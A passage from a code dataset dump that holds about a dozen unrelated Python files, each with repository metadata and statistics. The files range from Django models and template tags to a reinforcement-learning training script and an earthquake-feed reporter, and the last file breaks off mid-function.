        neg = 1 - pos

        with np.errstate(divide='ignore'):  # suppress warnings about log(0)
            return np.sum( pos[pos>0]*np.log(p[pos>0]) ) + np.sum( neg[neg>0]*np.log(1-p[neg>0]) )

    def to_dict(self):
        """Serialize hypers, latent values (keyed by input hash) and chain length."""
        gp_dict = {}

        gp_dict['hypers'] = {}
        for name, hyper in self.params.iteritems():
            gp_dict['hypers'][name] = hyper.value

        # Save the latent values as a dict with keys as hashes of the data
        # so that each latent value is associated with its input
        # then when we load them in we know which ones are which
        gp_dict['latent values'] = {str(hash(self._inputs[i].tostring())) : self.latent_values.value[i]
                                    for i in xrange(self._inputs.shape[0])}

        gp_dict['chain length'] = self.chain_length

        return gp_dict

    def from_dict(self, gp_dict):
        """Restore the state produced by to_dict()."""
        self._set_params_from_dict(gp_dict['hypers'])
        self._set_latent_values_from_dict(gp_dict['latent values'])
        self.chain_length = gp_dict['chain length']
| 43.354582 | 142 | 0.684111 | 2,965 | 21,764 | 4.93086 | 0.245868 | 0.036115 | 0.022982 | 0.008755 | 0.160944 | 0.119562 | 0.065937 | 0.048564 | 0.024487 | 0.024487 | 0 | 0.00981 | 0.241224 | 21,764 | 501 | 143 | 43.441118 | 0.8755 | 0.53005 | 0 | 0.120603 | 0 | 0 | 0.044144 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.095477 | null | null | 0.005025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3e28f994d4f8d390af434d713b2e934cf2435a9 | 1,050 | py | Python | hknweb/exams/migrations/0019_auto_20200413_0212.py | AndrewKe/hknweb | 8b0591625ffe0b2fa1f50fec453d674a03f52a2e | [
"MIT"
] | null | null | null | hknweb/exams/migrations/0019_auto_20200413_0212.py | AndrewKe/hknweb | 8b0591625ffe0b2fa1f50fec453d674a03f52a2e | [
"MIT"
] | null | null | null | hknweb/exams/migrations/0019_auto_20200413_0212.py | AndrewKe/hknweb | 8b0591625ffe0b2fa1f50fec453d674a03f52a2e | [
"MIT"
] | null | null | null | # Generated by Django 2.2.8 on 2020-04-13 09:12
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('exams', '0018_auto_20200412_1715'),
]
operations = [
migrations.CreateModel(
name='ExamChoice',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('exam_Choice', models.CharField(max_length=50)),
],
),
migrations.AlterField(
model_name='exam',
name='exam_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='exams.ExamChoice'),
),
migrations.AlterField(
model_name='exam',
name='instructor',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='exams.Instructor'),
),
migrations.DeleteModel(
name='CourseSemester',
),
]
| 30 | 114 | 0.590476 | 105 | 1,050 | 5.780952 | 0.533333 | 0.052718 | 0.069193 | 0.108731 | 0.336079 | 0.336079 | 0.214168 | 0.214168 | 0.214168 | 0.214168 | 0 | 0.043941 | 0.284762 | 1,050 | 34 | 115 | 30.882353 | 0.764314 | 0.042857 | 0 | 0.285714 | 1 | 0 | 0.125623 | 0.022931 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 0.178571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3e577b90c506a8bda99f5b1083dfe14aebd03c5 | 904 | py | Python | social_redirects/models.py | JoshZero87/site | c8024b805ff5ff0e16f54dce7bf05097fd2f08e0 | [
"MIT"
] | 4 | 2017-01-29T00:38:41.000Z | 2019-09-04T14:30:24.000Z | social_redirects/models.py | JoshZero87/site | c8024b805ff5ff0e16f54dce7bf05097fd2f08e0 | [
"MIT"
] | 74 | 2017-10-02T04:42:54.000Z | 2022-01-13T00:44:16.000Z | social_redirects/models.py | JoshZero87/site | c8024b805ff5ff0e16f54dce7bf05097fd2f08e0 | [
"MIT"
] | 3 | 2017-03-24T23:26:46.000Z | 2019-10-21T01:16:03.000Z | from django.contrib.sites.models import Site
from django.db import models
class Redirect(models.Model):
    # A per-site URL redirect with optional metadata (title, description,
    # image) for the redirected page.
    title = models.CharField(max_length=200)
    description = models.CharField(max_length=1024, blank=True, null=True)
    # Optional image for the redirect — presumably used for social-share
    # cards; confirm against the templates that render this model.
    social_image = models.ImageField(null=True, blank=True)
    old_path = models.CharField(max_length=200, db_index=True, verbose_name="Redirect From", help_text="This should be an absolute path, excluding the domain name. Example: '/events/search/'.")
    new_path = models.CharField(max_length=200, blank=True, verbose_name="Redirect To", help_text="This can be either an absolute path (as above) or a full URL starting with 'http://'.")
    site = models.ForeignKey(Site, models.CASCADE)

    class Meta:
        # Each old path may be redirected only once per site.
        unique_together = (('site', 'old_path'),)
        ordering = ('old_path',)

    def __str__(self):
        return "%s ---> %s" % (self.old_path, self.new_path)
| 45.2 | 193 | 0.710177 | 128 | 904 | 4.851563 | 0.515625 | 0.096618 | 0.115942 | 0.154589 | 0.143317 | 0.099839 | 0 | 0 | 0 | 0 | 0 | 0.017128 | 0.160398 | 904 | 19 | 194 | 47.578947 | 0.801054 | 0 | 0 | 0 | 0 | 0 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.142857 | 0.071429 | 0.857143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
d3e9f7de3f63d7f3de57a5c2272c7c0ae564d742 | 932 | py | Python | cloud/db/db.py | bother3000/Smart-IoT-Planting-System | 7c33f150850fb8c9bc250fa02bf306f02f7cafb8 | [
"MIT"
] | 171 | 2017-09-22T08:25:18.000Z | 2022-02-28T07:56:41.000Z | cloud/db/db.py | bother3000/Smart-IoT-Planting-System | 7c33f150850fb8c9bc250fa02bf306f02f7cafb8 | [
"MIT"
] | 2 | 2018-06-28T02:33:04.000Z | 2021-06-09T06:56:58.000Z | cloud/db/db.py | bother3000/Smart-IoT-Planting-System | 7c33f150850fb8c9bc250fa02bf306f02f7cafb8 | [
"MIT"
] | 108 | 2017-10-03T20:11:52.000Z | 2022-03-19T15:21:48.000Z | #!/usr/bin/env python
import pymysql #Python3
db = pymysql.connect("localhost","sips","root","zaijian" )
cursor = db.cursor()
cursor.execute("SELECT VERSION()")
data = cursor.fetchone()
print ("Database version : %s " % data)
db.close()
def create_table():
    """(Re)create the EMPLOYEE table, dropping any existing copy first."""
    db = pymysql.connect("localhost","sips","root","zaijian" )
    try:
        cursor = db.cursor()
        cursor.execute("DROP TABLE IF EXISTS EMPLOYEE")
        sql = """CREATE TABLE EMPLOYEE (
                 FIRST_NAME  CHAR(20) NOT NULL,
                 LAST_NAME  CHAR(20),
                 AGE INT,
                 SEX CHAR(1),
                 INCOME FLOAT )"""
        cursor.execute(sql)
    finally:
        # Close the connection even when a statement raises, so failed
        # calls do not leak connections (the original only closed on the
        # success path).
        db.close()
def db_insert():
    """Insert one sample EMPLOYEE row, committing on success.

    Rolls back the transaction on a database error and always closes
    the connection.
    """
    db = pymysql.connect("localhost","sips","root","zaijian" )
    try:
        cursor = db.cursor()
        sql = """INSERT INTO EMPLOYEE(FIRST_NAME,
                 LAST_NAME, AGE, SEX, INCOME)
                 VALUES ('Mac', 'Mohan', 20, 'M', 2000)"""
        try:
            cursor.execute(sql)
            db.commit()
        # Narrowed from a bare `except:` which also swallowed
        # KeyboardInterrupt/SystemExit.
        except Exception:
            db.rollback()
    finally:
        db.close()
| 23.897436 | 60 | 0.610515 | 118 | 932 | 4.771186 | 0.466102 | 0.092362 | 0.085258 | 0.133215 | 0.333925 | 0.333925 | 0.333925 | 0.333925 | 0.333925 | 0.333925 | 0 | 0.016484 | 0.218884 | 932 | 38 | 61 | 24.526316 | 0.756868 | 0.02897 | 0 | 0.354839 | 0 | 0 | 0.460687 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.032258 | null | null | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3ebad071ed8577b67556835d306ad97a7a130ad | 217 | py | Python | algoritmos/ajuste-curvas/caso-linear/Teste.py | mauriciomoccelin/metodos-numericos | 67bdb305d4db8a59943a17128ba2c06fefcc4a36 | [
"MIT"
] | 3 | 2019-07-03T18:05:44.000Z | 2020-02-04T16:37:21.000Z | algoritmos/ajuste-curvas/caso-linear/Teste.py | mauriciomoccelin/metodos-numericos | 67bdb305d4db8a59943a17128ba2c06fefcc4a36 | [
"MIT"
] | null | null | null | algoritmos/ajuste-curvas/caso-linear/Teste.py | mauriciomoccelin/metodos-numericos | 67bdb305d4db8a59943a17128ba2c06fefcc4a36 | [
"MIT"
] | null | null | null | from RegressaoLinear import RegressaoLinear
# Sample observations to fit: keys are x values, values are y values.
planoCartesiano = {
    0.5: 4.4,
    2.8: 1.8,
    4.2: 1.0,
    6.7: 0.4,
    8.3: 0.2
}

# Fit a linear regression to the points and print the fitted equation.
regressaoLinear = RegressaoLinear(planoCartesiano)
print(regressaoLinear.gerar_equacao())
| 16.692308 | 50 | 0.705069 | 32 | 217 | 4.75 | 0.5 | 0.394737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10929 | 0.156682 | 217 | 12 | 51 | 18.083333 | 0.721311 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.1 | 0.1 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3f026b7191d98da19a4514bcacdc0c4c65fbbab | 433 | py | Python | UDEMY-Learn Python Programming Masterclass/Section 3-Stepping into the World of Python/exercise4.py | Sanjay9921/Python | 05ac161dd46f9b4731a5c14ff5ef52adb705e8e6 | [
"MIT"
] | null | null | null | UDEMY-Learn Python Programming Masterclass/Section 3-Stepping into the World of Python/exercise4.py | Sanjay9921/Python | 05ac161dd46f9b4731a5c14ff5ef52adb705e8e6 | [
"MIT"
] | null | null | null | UDEMY-Learn Python Programming Masterclass/Section 3-Stepping into the World of Python/exercise4.py | Sanjay9921/Python | 05ac161dd46f9b4731a5c14ff5ef52adb705e8e6 | [
"MIT"
] | null | null | null | #Integer division
#You have a shop selling buns for $2.40 each. A customer comes in with $15, and would like to buy as many buns as possible.
#Complete the code to calculate how many buns the customer can afford.
#Note: Your customer won't be happy if you try to sell them part of a bun.
#Print only the result, any other text in the output will cause the checker to fail.
# Price of a single bun and the customer's available money.
bun_price = 2.40
money = 15

# Floor division discards the fractional bun the customer cannot buy;
# only the whole-bun count is printed.
print(money // bun_price)
310233a1e9f02803dc17a9f40655a8b55df02a4a | 1,657 | py | Python | weeklypedia/publish.py | Nintendofan885/weeklypedia | 512be3814a693d7ba3044bda7965e7a5d3d137fd | [
"Unlicense"
] | null | null | null | weeklypedia/publish.py | Nintendofan885/weeklypedia | 512be3814a693d7ba3044bda7965e7a5d3d137fd | [
"Unlicense"
] | null | null | null | weeklypedia/publish.py | Nintendofan885/weeklypedia | 512be3814a693d7ba3044bda7965e7a5d3d137fd | [
"Unlicense"
] | null | null | null | # -*- coding: utf-8 -*-
import os
import json
from os.path import dirname
from argparse import ArgumentParser
from clastic.render import AshesRenderFactory
from common import DEBUG, DEBUG_LIST_ID, SENDKEY
from web import (comma_int,
ISSUE_TEMPLATES_PATH)
from bake import (Issue,
bake_latest_issue,
render_index,
SUPPORTED_LANGS)
# Directory containing this module; secrets.json lives alongside it.
_CUR_PATH = dirname(os.path.abspath(__file__))
# Mapping of language code -> mailing-list id, loaded from secrets.json
# at import time (None if the file has no 'list_ids' key).
LIST_ID_MAP = json.load(open(os.path.join(_CUR_PATH, 'secrets.json'))).get('list_ids')
def send_issue(lang, is_dev=False):
    """Build the latest issue for *lang* and send it to its mailing list.

    When *is_dev* is true the debug list is targeted instead of the
    language's production list.
    """
    target_list = DEBUG_LIST_ID if is_dev else LIST_ID_MAP[lang]
    return Issue(lang, include_dev=is_dev).send(target_list, SENDKEY)
def get_argparser():
    """Return the command-line parser for baking and sending issues."""
    description = 'Bake and send Weeklypedia issues. (Please fetch first)'
    arg_parser = ArgumentParser(description=description)
    arg_parser.add_argument('--lang', default=None)
    arg_parser.add_argument('--bake_all', default=False, action='store_true')
    arg_parser.add_argument('--debug', default=DEBUG, action='store_true')
    return arg_parser
if __name__ == '__main__':
    # Build the Ashes template environment with the comma-int filter.
    issue_ashes_env = AshesRenderFactory(ISSUE_TEMPLATES_PATH,
                                         filters={'ci': comma_int}).env
    parser = get_argparser()
    args = parser.parse_args()
    debug = args.debug
    # --bake_all renders every supported language to static output.
    if args.bake_all:
        for lang in SUPPORTED_LANGS:
            bake_latest_issue(issue_ashes_env, lang=lang, include_dev=debug)
    # A single --lang both bakes and actually sends that issue.
    if args.lang in SUPPORTED_LANGS:
        lang = args.lang
        print bake_latest_issue(issue_ashes_env, lang=lang, include_dev=debug)
        print send_issue(lang, debug)
| 31.264151 | 86 | 0.674713 | 222 | 1,657 | 4.720721 | 0.355856 | 0.040076 | 0.042939 | 0.038168 | 0.097328 | 0.097328 | 0.097328 | 0.097328 | 0.097328 | 0.097328 | 0 | 0.000781 | 0.22752 | 1,657 | 52 | 87 | 31.865385 | 0.817969 | 0.012674 | 0 | 0 | 0 | 0 | 0.077723 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.195122 | null | null | 0.04878 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
310c8eff631db50cd8a05c87d1793446b7ad450c | 4,065 | py | Python | examples/fixed_play.py | wwxFromTju/malib | 7cd2a4af55cf1f56da8854e26ea7a4f3782ceea2 | [
"MIT"
] | 6 | 2021-05-19T10:25:36.000Z | 2021-12-27T03:30:33.000Z | examples/fixed_play.py | wwxFromTju/malib | 7cd2a4af55cf1f56da8854e26ea7a4f3782ceea2 | [
"MIT"
] | 1 | 2021-05-29T04:51:37.000Z | 2021-05-30T06:18:10.000Z | examples/fixed_play.py | ying-wen/malib_deprecated | 875338b81c4d87064ad31201f461ef742db05f25 | [
"MIT"
] | 1 | 2021-05-31T16:16:12.000Z | 2021-05-31T16:16:12.000Z | # Created by yingwen at 2019-03-16
from multiprocessing import Process
from malib.agents.agent_factory import *
from malib.environments import DifferentialGame
from malib.logger.utils import set_logger
from malib.samplers.sampler import MASampler
from malib.trainers import MATrainer
from malib.utils.random import set_seed
def get_agent_by_type(type_name, i, env, hidden_layer_sizes, max_replay_buffer_size):
    """Construct the agent for player *i* from an algorithm name.

    Args:
        type_name: algorithm identifier, e.g. "SAC", "ROMMEO", "MADDPG".
        i: agent index within the environment.
        env: the (multi-agent) environment instance.
        hidden_layer_sizes: tuple of hidden-layer widths for the networks.
        max_replay_buffer_size: capacity of the agent's replay buffer.

    Raises:
        ValueError: for an unknown *type_name* (the original silently
        returned None, which only surfaced later as an obscure error).
    """
    # Keyword arguments shared by every factory below.
    common = dict(
        hidden_layer_sizes=hidden_layer_sizes,
        max_replay_buffer_size=max_replay_buffer_size,
    )
    if type_name == "SAC":
        # SAC is the only factory that does not take an agent_id.
        return get_sac_agent(env, **common)
    if type_name == "ROMMEO":
        return get_rommeo_agent(env, agent_id=i, **common)
    if type_name == "ROMMEO-UNI":
        return get_rommeo_agent(env, agent_id=i, uniform=True, **common)
    if type_name == "DDPG-OM":
        return get_ddpgom_agent(env, agent_id=i, **common)
    if type_name == "DDPG-TOM":
        return get_ddpgtom_agent(env, agent_id=i, **common)
    if type_name == "DDPG":
        return get_ddpg_agent(env, agent_id=i, **common)
    if type_name in ("MADDPG", "MFAC"):
        # NOTE(review): the original mapped both MADDPG and MFAC to
        # get_maddpg_agent; if an MFAC-specific factory exists it should
        # be used here — confirm.
        return get_maddpg_agent(env, agent_id=i, **common)
    raise ValueError("Unknown agent type: %r" % (type_name,))
def train_fixed(seed, agent_setting, game_name="ma_softq"):
    """Train one fixed pairing of agents on a differential game.

    *agent_setting* encodes one agent type per player joined by '_'
    (e.g. "ROMMEO_ROMMEO"); logs are written under a per-run suffix
    derived from game, setting and seed.
    """
    set_seed(seed)
    suffix = f"fixed_play1/{game_name}/{agent_setting}/{seed}"
    set_logger(suffix)

    # Training hyperparameters for this experiment.
    batch_size = 512
    training_steps = 2000
    exploration_steps = 100
    max_replay_buffer_size = 1e5
    hidden_layer_sizes = (128, 128)
    max_path_length = 1

    agent_num = 2
    env = DifferentialGame(game_name, agent_num)

    agents = []
    agent_types = agent_setting.split("_")
    # Exactly one agent type per player is required.
    assert len(agent_types) == agent_num
    for i, agent_type in enumerate(agent_types):
        agents.append(
            get_agent_by_type(
                agent_type,
                i,
                env,
                hidden_layer_sizes=hidden_layer_sizes,
                max_replay_buffer_size=max_replay_buffer_size,
            )
        )
    sampler = MASampler(
        agent_num, batch_size=batch_size, max_path_length=max_path_length
    )
    sampler.initialize(env, agents)
    trainer = MATrainer(
        env=env,
        agents=agents,
        sampler=sampler,
        steps=training_steps,
        exploration_steps=exploration_steps,
        training_interval=1,
        extra_experiences=["annealing", "recent_experiences"],
        batch_size=batch_size,
    )
    trainer.run()
def main():
    """Launch one training process per seed for each agent pairing."""
    settings = [
        "ROMMEO_ROMMEO",
    ]
    game = "ma_softq"
    for setting in settings:
        processes = []
        for run_idx in range(1):
            seed = 1 + int(23122134 / (run_idx + 1))
            # Pass arguments explicitly instead of closing over loop
            # variables with a nested function: local closures cannot be
            # pickled under the 'spawn' start method (Windows/macOS) and
            # late binding makes them fragile if start() ever moves out
            # of this loop.
            proc = Process(target=train_fixed, args=(seed, setting, game))
            proc.start()
            processes.append(proc)
        # Wait for all runs of this setting before moving to the next.
        for proc in processes:
            proc.join()
if __name__ == "__main__":
    # Entry point: run all configured fixed-pairing experiments.
    main()
| 28.229167 | 85 | 0.613284 | 484 | 4,065 | 4.75 | 0.241736 | 0.095694 | 0.139191 | 0.165289 | 0.408873 | 0.406699 | 0.406699 | 0.391475 | 0.391475 | 0.391475 | 0 | 0.014648 | 0.311439 | 4,065 | 143 | 86 | 28.426573 | 0.806717 | 0.023862 | 0 | 0.311475 | 0 | 0 | 0.040121 | 0.011607 | 0 | 0 | 0 | 0 | 0.008197 | 1 | 0.032787 | false | 0 | 0.057377 | 0 | 0.155738 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
310e8a0bf4712762b03a5c5b70b449b48e5c9b02 | 776 | py | Python | hypha/apply/projects/templatetags/payment_request_tools.py | maxpearl/hypha | e181ebadfb744aab34617bb766e746368d6f2de0 | [
"BSD-3-Clause"
] | 16 | 2020-01-24T11:52:46.000Z | 2021-02-02T22:21:04.000Z | hypha/apply/projects/templatetags/payment_request_tools.py | maxpearl/hypha | e181ebadfb744aab34617bb766e746368d6f2de0 | [
"BSD-3-Clause"
] | 538 | 2020-01-24T08:27:13.000Z | 2021-04-05T07:15:01.000Z | hypha/apply/projects/templatetags/payment_request_tools.py | maxpearl/hypha | e181ebadfb744aab34617bb766e746368d6f2de0 | [
"BSD-3-Clause"
] | 17 | 2020-02-07T14:55:54.000Z | 2021-04-04T19:32:38.000Z | import decimal
from django import template
register = template.Library()
@register.simple_tag
def can_change_status(payment_request, user):
    # Template tag: delegate the permission check to the payment request.
    return payment_request.can_user_change_status(user)
@register.simple_tag
def can_delete(payment_request, user):
    # Template tag: delegate the permission check to the payment request.
    return payment_request.can_user_delete(user)
@register.simple_tag
def can_edit(payment_request, user):
    # Template tag: delegate the permission check to the payment request.
    return payment_request.can_user_edit(user)
@register.simple_tag
def percentage(value, total):
    """Return *value* as a percentage of *total*, truncated to one decimal.

    Returns Decimal(0) when *total* is falsy, avoiding division by zero.
    Operands are coerced to Decimal so the tag also works for int/float
    inputs: plain ``(value / total) * 100`` produces a float, and float
    has no ``quantize`` method, which crashed the original.
    """
    if not total:
        return decimal.Decimal(0)

    unrounded_total = (decimal.Decimal(value) / decimal.Decimal(total)) * 100
    # round using Decimal since we're dealing with currency
    rounded_total = unrounded_total.quantize(
        decimal.Decimal('0.0'),
        rounding=decimal.ROUND_DOWN,
    )
    return rounded_total
| 20.972973 | 59 | 0.748711 | 103 | 776 | 5.38835 | 0.378641 | 0.151351 | 0.122523 | 0.144144 | 0.425225 | 0.340541 | 0.243243 | 0.243243 | 0 | 0 | 0 | 0.009331 | 0.171392 | 776 | 36 | 60 | 21.555556 | 0.85381 | 0.068299 | 0 | 0.181818 | 0 | 0 | 0.004161 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.090909 | 0.136364 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
311249ddd416775b05d1978d206331804a252949 | 3,016 | py | Python | arguments.py | nudles/a2c | 6225845ab450b5ea03b6a066455b0446d3f92ed0 | [
"MIT"
] | null | null | null | arguments.py | nudles/a2c | 6225845ab450b5ea03b6a066455b0446d3f92ed0 | [
"MIT"
] | 4 | 2021-03-19T03:19:18.000Z | 2022-01-13T01:35:04.000Z | arguments.py | nudles/a2c | 6225845ab450b5ea03b6a066455b0446d3f92ed0 | [
"MIT"
] | null | null | null | import argparse
import torch
def get_args():
    """Parse command-line arguments for RL training.

    Returns the parsed argparse.Namespace.  When --cuda is given, fails
    fast if CUDA is not actually available on this machine.

    Note: several help strings previously contradicted the real defaults
    (lr, num-processes, num-steps, log-interval, num-frames, --cuda);
    they now reflect the values actually used.
    """
    parser = argparse.ArgumentParser(description='RL')
    parser.add_argument('--algo', default='a2c',
                        help='algorithm to use: a2c | ppo ')
    parser.add_argument('--lr', type=float, default=7e-5,
                        help='learning rate (default: 7e-5)')
    parser.add_argument('--eps', type=float, default=1e-5,
                        help='RMSprop optimizer epsilon (default: 1e-5)')
    parser.add_argument('--alpha', type=float, default=0.99,
                        help='RMSprop optimizer alpha (default: 0.99)')
    parser.add_argument('--gamma', type=float, default=0.99,
                        help='discount factor for rewards (default: 0.99)')
    parser.add_argument('--max-grad-norm', type=float, default=0.5,
                        help='max norm of gradients (default: 0.5)')
    parser.add_argument('--seed', type=int, default=1,
                        help='random seed (default: 1)')
    parser.add_argument('--num-processes', type=int, default=1,
                        help='how many training CPU processes to use (default: 1)')
    parser.add_argument('--num-steps', type=int, default=32,
                        help='number of forward steps in A2C (default: 32)')
    parser.add_argument('--clip-param', type=float, default=0.2,
                        help='clip parameter (default: 0.2)')
    parser.add_argument('--log-interval', type=int, default=50,
                        help='log interval, one log per n updates (default: 50)')
    parser.add_argument('--num-frames', type=int, default=80000,
                        help='number of frames to train (default: 80000)')
    parser.add_argument('--cuda', action='store_true', default=False,
                        help='enables CUDA training (disabled by default)')
    parser.add_argument('--obs_size', type=int, default=200,
                        help='observation vector size')
    parser.add_argument('--cycle_len', type=int, default=500,
                        # NOTE(review): help text was copy-pasted from
                        # --obs_size; "cycle length" matches the flag name.
                        help='cycle length (default: 500)')
    parser.add_argument('--debug', action='store_true', default=False,
                        help='whether to record the logfile')
    parser.add_argument('--num_models', type=int, default=3,
                        help='number of the model to use')
    parser.add_argument('--beta', type=float, default=1,
                        help='balance the accuracy and latency when calculate the reward')
    parser.add_argument('--tau', type=float, default=2,
                        help='max waiting time for enqueue')
    parser.add_argument('--max_latency', type=float, default=16,
                        help='accept latency for each request')
    parser.add_argument('--policy', choices=['async', 'sync'], default='async', help='policy')
    args = parser.parse_args()
    print("cuda: %s" % str(args.cuda))
    if args.cuda:
        # Fail fast when CUDA was requested on a machine without it.
        assert torch.cuda.is_available(), 'CUDA is not available in this machine!'
    return args
if __name__ == '__main__':
    # Allow quick inspection of the parsed defaults from the command line.
    get_args()
3117a458a92a3f74cb40891238fd7657a360b0d8 | 207 | py | Python | tests/test_backup.py | KonstantinPankratov/Backupy | bfbbc97242bbf3c16da5454b5ff8741bfafa74c0 | [
"MIT"
] | 1 | 2020-02-12T12:58:28.000Z | 2020-02-12T12:58:28.000Z | tests/test_backup.py | KonstantinPankratov/Backupy | bfbbc97242bbf3c16da5454b5ff8741bfafa74c0 | [
"MIT"
] | null | null | null | tests/test_backup.py | KonstantinPankratov/Backupy | bfbbc97242bbf3c16da5454b5ff8741bfafa74c0 | [
"MIT"
] | null | null | null | import os
from Backupy import Backupy
def test_backup():
    """Smoke-test Backupy: archive the current directory, then clean up."""
    backup = Backupy()
    backup.add_directory('./')
    backup.start()
    try:
        # start() must have produced the archive file.
        assert os.path.exists(backup.filename)
    finally:
        # Remove the archive even when the assertion fails, so repeated
        # runs do not accumulate stale backup files (the original left
        # the file behind on failure).
        if os.path.exists(backup.filename):
            os.remove(backup.filename)
| 17.25 | 42 | 0.690821 | 26 | 207 | 5.423077 | 0.576923 | 0.198582 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.188406 | 207 | 11 | 43 | 18.818182 | 0.839286 | 0 | 0 | 0 | 0 | 0 | 0.009662 | 0 | 0 | 0 | 0 | 0 | 0.125 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.375 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3129453a0038e24bbee80e8d29bce23d328268df | 4,114 | py | Python | quake_reporter/quake_datafeed.py | shandozer/quake_reporter | 4e1eed5180b2f7dc3662b61ef32ef0b69c0fae01 | [
"MIT"
] | null | null | null | quake_reporter/quake_datafeed.py | shandozer/quake_reporter | 4e1eed5180b2f7dc3662b61ef32ef0b69c0fae01 | [
"MIT"
] | null | null | null | quake_reporter/quake_datafeed.py | shandozer/quake_reporter | 4e1eed5180b2f7dc3662b61ef32ef0b69c0fae01 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""
__author__ = Shannon T. Buckley, 10/8/16
Python 2.7.x
"""
import json
import urllib2
import datetime
import argparse
VERSION = '0.2.1'
def get_parser():
parser = argparse.ArgumentParser()
parser.add_argument('-m', '--magnitude', action="store", type=float,
help='Please enter minimum magnitude desired: 1.0, 2.5, or 4.5', default=2.5)
parser.add_argument('-t', '--timeframe', action="store", choices=['hour', 'day', 'week', 'month'],
help='Collect data over the last hour, day, week, or month.')
parser.add_argument('-s', '--savejson', action="store_true",
help='Use this flag to save output to a .json')
return parser
def get_data_from_api(url):
page = urllib2.urlopen(url)
data = page.read()
return data
def save_json_data(data, req_details):
with open('quake_request_{}_{:%Y_%m_%d_%H:%M}.json'.format(req_details, datetime.datetime.now()), 'wb') as f:
json.dump(data, f)
def print_results(data, magnitude):
json_data = json.loads(data)
if 'title' in json_data['metadata']:
print json_data['metadata']['title']
count = json_data['metadata']['count']
print '\n--> {} events found in the {}\n'.format(str(count), json_data['metadata']['title'].split(', ')[1])
tsunami_quakes = [quake for quake in json_data['features'] if quake['properties']['tsunami'] == 1]
tsunami_count = len(tsunami_quakes)
if tsunami_count > 0:
print "\t{} of these caused TSUNAMI\n".format(tsunami_count)
sorted_json = sorted(json_data['features'], key=lambda k: k['properties'].get('time', 0), reverse=True)
for i in sorted_json:
print '*' * 18 + '\n'
if i['properties']['time']:
local_quake_time = i['properties']['time']
quake_date = datetime.datetime(1970, 1, 1) + datetime.timedelta(milliseconds=local_quake_time)
print 'Date of Quake: {}'.format(quake_date.strftime('%m-%d-%Y %H:%M:%S'))
time_since_quake = datetime.timedelta() - datetime.timedelta(days=-quake_date.day,
hours=quake_date.hour,
minutes=quake_date.minute,
seconds=quake_date.second)
if i['properties']['tsunami'] == 1:
print "\n\t_/*~~~ TSUNAMI CREATED! ~~~*\_\n"
if i['properties']['mag']:
